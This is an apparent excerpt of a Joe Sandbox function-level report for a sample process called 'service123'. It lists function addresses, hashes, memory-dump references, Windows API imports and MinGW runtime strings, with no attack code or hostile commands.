Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 730b82d2da7bc35f9127cbebe574e0472547f7dc119ace965d717b640774afe3
Instruction ID: c522110df3ee2525f0e93bb560402f6fc237ec81782a16411b2a58d83c52f1d9
Opcode Fuzzy Hash: 730b82d2da7bc35f9127cbebe574e0472547f7dc119ace965d717b640774afe3
Instruction Fuzzy Hash: 67112E74A042189BCB14DF64C8809DEB7B5EF86358F44C964EC4967B01DB30AE49CFE1

Function 6C34DD80 Relevance: 19.6, APIs: 13, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fe2482c830eee9ded9460493a8ea6eab20a7d1ebb5a31b0fcc83bb6770a18bd
Instruction ID: e077ff346b5c5c58adb4553dec1adcb0d85db1cfe02f238fcba5965c61fa930d
Opcode Fuzzy Hash: 5fe2482c830eee9ded9460493a8ea6eab20a7d1ebb5a31b0fcc83bb6770a18bd
Instruction Fuzzy Hash: 1D21F974A0421D9BCF14DF64C8809DEB7B5EF89358F14C8A8D94967741DB30AE4ACFA1

Function 6C350310 Relevance: 18.2, APIs: 12, Instructions: 165COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C41395F), ref: 6C35034B
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C41395F), ref: 6C350352
SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C41395F), ref: 6C350360

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: ErrorLast$Value
String ID:
API String ID: 1883355122-0
Opcode ID: b9236d9de2f5776ad1bbce36d91a8d327f43d1fdd8822507ef7113c741acee47
Instruction ID: f4a9073d854f356d9e27a326eb8f140d693a5647fbf9f54b43d151238b614b21
Opcode Fuzzy Hash: b9236d9de2f5776ad1bbce36d91a8d327f43d1fdd8822507ef7113c741acee47
Instruction Fuzzy Hash: CE514EB47093418FCB00EF69C584A6A7BF5BB8630CF95492CD88487B15E732E855CFA2

Function 6C34A690 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 129fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 6C34A6BF
vfprintf.MSVCRT ref: 6C34A6DF
abort.MSVCRT ref: 6C34A6E4
VirtualQuery.KERNEL32 ref: 6C34A77B

Strings

Mingw-w64 runtime failure:, xrefs: 6C34A6B8
VirtualProtect failed with code 0x%x, xrefs: 6C34A7F6
VirtualQuery failed for %d bytes at address %p, xrefs: 6C34A827
Address %p has no image-section, xrefs: 6C34A83B

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: QueryVirtualabortfwritevfprintf
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 2513968241-1534286854
Opcode ID: e90ab0d8037c8764e63a383482071405c5a82160eea12fd0a5d75d202bb7062d
Instruction ID: 7940430798522fd7b80682e928792de1cb5ce59065f9ee7d5d3952c7a5459ae6
Opcode Fuzzy Hash: e90ab0d8037c8764e63a383482071405c5a82160eea12fd0a5d75d202bb7062d
Instruction Fuzzy Hash: A75149B1A083009BD710EF69C585A5AFBF4FF85318F55C92CE8888B654D735A849CFA2

Function 00011940 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 129fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 0001196F
vfprintf.MSVCRT ref: 0001198F
abort.MSVCRT ref: 00011994
VirtualQuery.KERNEL32 ref: 00011A2B

Strings

VirtualProtect failed with code 0x%x, xrefs: 00011AA6
VirtualQuery failed for %d bytes at address %p, xrefs: 00011AD7
Address %p has no image-section, xrefs: 00011AEB
Mingw-w64 runtime failure:, xrefs: 00011968

Memory Dump Source

Source File: 00000005.00000002.3307743651.0000000000011000.00000020.00000001.01000000.00000005.sdmp, Offset: 00010000, based on PE: true

Associated: 00000005.00000002.3307715899.0000000000010000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307770444.000000000001A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307796313.000000000001E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307816608.0000000000021000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000_service123.jbxd

Similarity

API ID: QueryVirtualabortfwritevfprintf
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 2513968241-1534286854
Opcode ID: 7f3cd7d366d828d5fe34c1bd3f0f0c08b4a98870d45ed21bbbbf63eb7a4831b3
Instruction ID: e6bf82ef163034aac56646328373f1f3f3d03b3b44f2971cfa0f360b9e932c78
Opcode Fuzzy Hash: 7f3cd7d366d828d5fe34c1bd3f0f0c08b4a98870d45ed21bbbbf63eb7a4831b3
Instruction Fuzzy Hash: FC518AB15093008FD704EF68D9857DAFBE0FF88354F45C92DE9988B211D738E9858B92

Function 6C34E0A0 Relevance: 16.6, APIs: 11, Instructions: 98COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D4C
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D51
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D56
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D5B
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D60
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D65
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D6A
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D7E

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 375f889762f869647f49ea4a0340b3ce3ffd515c4ce41870d94e156c6232c916
Instruction ID: 1af6018dab474594b8c4473ef09aab769853def5bcde530185961f8eba648b46
Opcode Fuzzy Hash: 375f889762f869647f49ea4a0340b3ce3ffd515c4ce41870d94e156c6232c916
Instruction Fuzzy Hash: FB21F6323493148BC704CF59D8819D6B3E6EBC632C728C1BED5588BB55D637E816DBA0

Function 6C34E570 Relevance: 15.1, APIs: 10, Instructions: 145COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D51
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D56
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D5B
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D60
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D65
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D6A
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D7E

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 9dd2c658d3c2cb619c7bf21bb267980a7d57e1b10d09043a9d0bcde5e8cf3aa6
Instruction ID: 942789efd109991aa0bcac55c519bd701aeceae7593a9387579c2996a897f281
Opcode Fuzzy Hash: 9dd2c658d3c2cb619c7bf21bb267980a7d57e1b10d09043a9d0bcde5e8cf3aa6
Instruction Fuzzy Hash: EC41B4706083168BD750DF29C08076AFBE5EF91318F54CA19E4B487A95E339D94E8FE2

Function 6C34E59B Relevance: 15.1, APIs: 10, Instructions: 89COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D51
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D56
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D5B
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D60
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D65
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D6A
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D7E

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 602950868eee7070e08be62886ca486b6e553905e997eb949550a7b66955e2bd
Instruction ID: 95da904f304e35e99115d624197dbcdf2a06eee50de57155fc46c7cbea4aa9a5
Opcode Fuzzy Hash: 602950868eee7070e08be62886ca486b6e553905e997eb949550a7b66955e2bd
Instruction Fuzzy Hash: EF21B2706053128BD710DF28C09066AF7E1AF81318F64CE49E4E487E85E335D94E8FD2

Function 6C34E714 Relevance: 15.0, APIs: 10, Instructions: 35COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D51
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D56
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D5B
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D60
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D65
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D6A
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D7E

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 9e089e6cd6cd64aa5b62a2a55d0ff6e4215562d1fbf434e16bed1c0db5fcfaf7
Instruction ID: 9c9b6b78e2323fe7e0c4f5e90023e6c6651c6699db8a8e010d15cda664ecfd35
Opcode Fuzzy Hash: 9e089e6cd6cd64aa5b62a2a55d0ff6e4215562d1fbf434e16bed1c0db5fcfaf7
Instruction Fuzzy Hash: 9DE04F704887198AC610CF28C0519D5F7D9DB56348F408846D4D586D14D325D94B8E93

Function 6C359249 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 31libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 6C359260
GetProcAddress.KERNEL32 ref: 6C35927A
LoadLibraryW.KERNEL32 ref: 6C35929F
GetProcAddress.KERNEL32 ref: 6C3592B3

Strings

msvcrt.dll, xrefs: 6C359255
rand_s, xrefs: 6C35926F
SystemFunction036, xrefs: 6C3592A8
advapi32.dll, xrefs: 6C359298

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: SystemFunction036$advapi32.dll$msvcrt.dll$rand_s
API String ID: 384173800-4041758303
Opcode ID: c7f7d0b771e15075005b63352db0464e96dd6cedfb6ab35c8797837dae63bd8b
Instruction ID: 3160bcc3e6254d13b811743f57ba00afc9650a55e17621d17428dbc546bfe873
Opcode Fuzzy Hash: c7f7d0b771e15075005b63352db0464e96dd6cedfb6ab35c8797837dae63bd8b
Instruction Fuzzy Hash: B7F037F29483008BCB00FFB9854BA1ABFB4FB06364F41096CD4C897608E2389424DBA7

Function 6C3DF8C0 Relevance: 13.7, APIs: 8, Strings: 1, Instructions: 224COMMON

Download Yara Rule

APIs

memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C3BDA2E), ref: 6C3DF95D
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C3BDA2E), ref: 6C3DF988
memmove.MSVCRT ref: 6C3DF9D7
memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C3BDA2E), ref: 6C3DFA0D
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C3BDA2E), ref: 6C3DFA58

Strings

basic_string::_M_replace, xrefs: 6C3DFBB6

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: memmove$memcpy
String ID: basic_string::_M_replace
API String ID: 3033661859-2323331477
Opcode ID: ab7588f611f8aa86568034f3f2dde7402f32285755083b77f26f2a8c4ddac106
Instruction ID: 94b94a3a8eed6669e661f75d5cd0c7ae46a88bd74419ffb8c554e45dc8e67954
Opcode Fuzzy Hash: ab7588f611f8aa86568034f3f2dde7402f32285755083b77f26f2a8c4ddac106
Instruction Fuzzy Hash: 7F810576A093519FC301DF2CC1D051EBBE1AF8A648F26895EE4D597715D232E888CFA2

Function 6C34FEE0 Relevance: 13.7, APIs: 9, Instructions: 186synchronizationCOMMON

Download Yara Rule

APIs

CreateSemaphoreW.KERNEL32 ref: 6C3500D2
WaitForSingleObject.KERNEL32 ref: 6C350117

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: CreateObjectSemaphoreSingleWait
String ID:
API String ID: 1168595426-0
Opcode ID: 7357a1442ec01faf7d4cb5b17cc30a7fc4379ee56658ba62ffb17eb54d0f70a0
Instruction ID: ef256d0b50ceb1c524083a376d81c966698d89b2ebf960c50415cae2e043fe1a
Opcode Fuzzy Hash: 7357a1442ec01faf7d4cb5b17cc30a7fc4379ee56658ba62ffb17eb54d0f70a0
Instruction Fuzzy Hash: E0619E707093458FDB10EF6AC544BA67BF4BB4A30CF448529E89887A44D772D819CFA2

Function 6C34E760 Relevance: 13.6, APIs: 9, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06e0c648a8d817803f94ec4fed503a03ca8cf05461f9862a5274ef0ffe4ad900
Instruction ID: 8f8e3e30542543f6e638386153eeb08ee0828560dce1a8536c9c390f3b23954c
Opcode Fuzzy Hash: 06e0c648a8d817803f94ec4fed503a03ca8cf05461f9862a5274ef0ffe4ad900
Instruction Fuzzy Hash: C901A575A593158FC700CA18C480A9AFBE5EB95328F059D29E49587B14D235D8CACFD2

Function 6C3532C0 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 407COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 6C353391

Strings

0, xrefs: 6C35380E
o, xrefs: 6C353778

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: memset
String ID: 0$o
API String ID: 2221118986-4157579757
Opcode ID: 00cb2d98c6e32ca29e5df2379417918a183b51e8976e900d5a5783c2af379635
Instruction ID: 7da4e40311d42d2853fa66a95521cc355b142b235a13a0a06f1c82c2da7f5ba9
Opcode Fuzzy Hash: 00cb2d98c6e32ca29e5df2379417918a183b51e8976e900d5a5783c2af379635
Instruction Fuzzy Hash: 2DF1A071A042088FCB01CF68C480BDDBBF2BF89364F598669D894AB785D734E955CF90

Function 00012BF0 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 407COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00012CC1

Strings

0, xrefs: 0001313E
o, xrefs: 000130A8

Memory Dump Source

Source File: 00000005.00000002.3307743651.0000000000011000.00000020.00000001.01000000.00000005.sdmp, Offset: 00010000, based on PE: true

Associated: 00000005.00000002.3307715899.0000000000010000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307770444.000000000001A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307796313.000000000001E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307816608.0000000000021000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000_service123.jbxd

Similarity

API ID: memset
String ID: 0$o
API String ID: 2221118986-4157579757
Opcode ID: 5a2ef28bdbcba101e83cdabdda6d05f5f0490c8583f277cf0ba504eb215e70c5
Instruction ID: cbed13eec5a420b5b88b781476e3e375453f666a2816830c79a1ec1ef84429f6
Opcode Fuzzy Hash: 5a2ef28bdbcba101e83cdabdda6d05f5f0490c8583f277cf0ba504eb215e70c5
Instruction Fuzzy Hash: 33F18F71A042098FCB15CF68C4946DDFBF2BF89360F198229E958AB391D734ED95CB90

Function 6C3413E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 6C3413F0
LoadLibraryA.KERNEL32 ref: 6C341406
GetProcAddress.KERNEL32 ref: 6C341425
GetProcAddress.KERNEL32 ref: 6C341437

Strings

libgcc_s_dw2-1.dll, xrefs: 6C3413E9, 6C3413FF
__deregister_frame_info, xrefs: 6C34142C
__register_frame_info, xrefs: 6C34141A

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: __deregister_frame_info$__register_frame_info$libgcc_s_dw2-1.dll
